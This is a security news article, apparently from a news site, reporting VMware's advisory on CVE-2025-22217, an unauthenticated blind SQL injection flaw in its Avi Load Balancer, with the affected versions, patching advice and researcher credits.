HomeRisk ManagementsVMware Alert: High-Risk Blind SQL Injection Bug Identified in Avi Load Balancer

VMware Alert: High-Risk Blind SQL Injection Bug Identified in Avi Load Balancer

Published on

spot_img

Virtualization technology giant VMware recently issued a warning about a blind SQL injection flaw in its Avi Load Balancer, which could potentially lead to attackers gaining broader access to databases. The vulnerability, identified as CVE-2025-22217, has been rated with a CVSS severity score of 8.6/10, indicating a significant risk level.

Described as an unauthenticated blind SQL Injection vulnerability, VMware emphasized the urgency for enterprise administrators to apply the available patches promptly, as there are no pre-patch workarounds to mitigate the issue. A high-risk bulletin from VMware specifically highlighted that a malicious user with network access could exploit specially crafted SQL queries to gain unauthorized database access.

The Avi Load Balancer, a widely utilized technology for managing incoming traffic across servers, plays a crucial role in ensuring the performance and security of cloud and on-premises applications. In addition to load balancing tasks, the product offers web application security and container ingress for cloud and datacenter applications, catering to a variety of organizational needs.

Designed to function seamlessly with both traditional virtual machine-based applications and containerized microservices, the Avi Load Balancer has become an integral component of many IT infrastructures. VMware has advised customers using versions 30.1.1, 30.1.2, 30.2.1, and 30.2.2 of the Avi Load Balancer to expedite the deployment of available patches. For those operating on older releases, upgrading to at least version 30.1.2 before applying the patch is recommended.

Given the absence of known workarounds at present, patching remains the most effective solution to address the identified vulnerability. The issue was brought to VMware’s attention through a private report, with credit given to researchers Daniel Kukuczka and Mateusz Darda for their discovery.

This recent alert adds to a series of security concerns faced by VMware, with previous disclosures addressing issues such as exploitation of vCenter Server flaws and high-severity SQL injection flaws in other platforms. The company’s ongoing efforts to address these vulnerabilities underscore the importance of robust cybersecurity measures and prompt patch management in today’s digital landscape.

Source link

Latest articles

Hackers infiltrate Microsoft IIS services through Cityworks RCE vulnerability

Hackers have successfully exploited a critical vulnerability in Cityworks deployments, a software used for...

Information about Home Office Apple iCloud access and FBI message scam alert

The UK Home Office, a government body overseeing key functions such as immigration, national...

Top 5 NIS2 Compliance Software and Solution Providers from heimdalsecurity.com

The Network and Information Systems Directive 2 (NIS2) has been officially implemented by the...

Challenges of balancing AI personalization and voter privacy in political campaigns

Researcher Mateusz Łabuz, from the IFSH, recently shared insights in a Help Net Security...

More like this

Hackers infiltrate Microsoft IIS services through Cityworks RCE vulnerability

Hackers have successfully exploited a critical vulnerability in Cityworks deployments, a software used for...

Information about Home Office Apple iCloud access and FBI message scam alert

The UK Home Office, a government body overseeing key functions such as immigration, national...

Top 5 NIS2 Compliance Software and Solution Providers from heimdalsecurity.com

The Network and Information Systems Directive 2 (NIS2) has been officially implemented by the...